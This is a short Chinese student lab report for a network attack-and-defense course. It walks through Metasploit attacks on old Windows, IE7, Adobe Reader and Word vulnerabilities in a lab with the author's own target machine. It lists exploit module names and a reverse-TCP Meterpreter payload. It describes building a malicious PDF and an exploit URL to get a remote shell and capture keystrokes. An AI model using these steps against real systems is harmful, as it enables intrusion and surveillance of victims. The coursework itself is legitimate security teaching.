20145321 《网络对抗技术》 MSF基础应用

实验内容

掌握metasploit的基本应用方式以及常用的三种攻击方式的思路

主动攻击，即对系统的攻击，不需要被攻击方配合，这里以ms08_067为例

针对浏览器的攻击，以ms11_050为例，针对IE7的漏洞攻击

针对客户端的攻击，即对具体应用上的攻击，以对Adobe阅读器的漏洞攻击为例

同样尝试针对具体的应用攻击，这里是针对word的ms10_087

尝试运用辅助模块，这里使用auxiliary/scanner/portscan/tcp模块，扫描目标系统的tcp端口

解释exploit,payload,encode是什么：

exploit是利用漏洞渗透攻击的代码；payload英文单词意思是有效载荷，在这里就是攻击载荷；encode是编码来实现免杀。

先查看kali和SP3的IP地址

进入msfconsole，选择使用ms08_067的exploit，再选择具体要负载使用的payload，设置载荷，主机ip，靶机ip

输入exploit命令即可攻击客户端、获取shell。可查看靶机IP

输入命令use exploit/windows/fileformat/adobe_cooltype_sing，进入该漏洞模块; 使用命令set payload windows/meterpreter/reverse_tcp设置攻击载荷;设置端口，主机ip，产生pdf文件名。

输入exploit,生成pdf文件，可以看到pdf所在文件夹，将pdf复制到靶机里。

主机开启监听模块

靶机运行PDF文件。攻击成功

输入命令use windows/browser/ms11050mshtml_cobjectelement，进入该漏洞模块，并设置参数

用exploit 生成一个网址

靶机打开网址http：//192.168.43.36：8080/zzy

攻击成功，抓击键记录，获取shell

用search了解一下有关scanner/http/dir_listing的相关信息

show auxiliary查看攻击模块，设置参数

exploit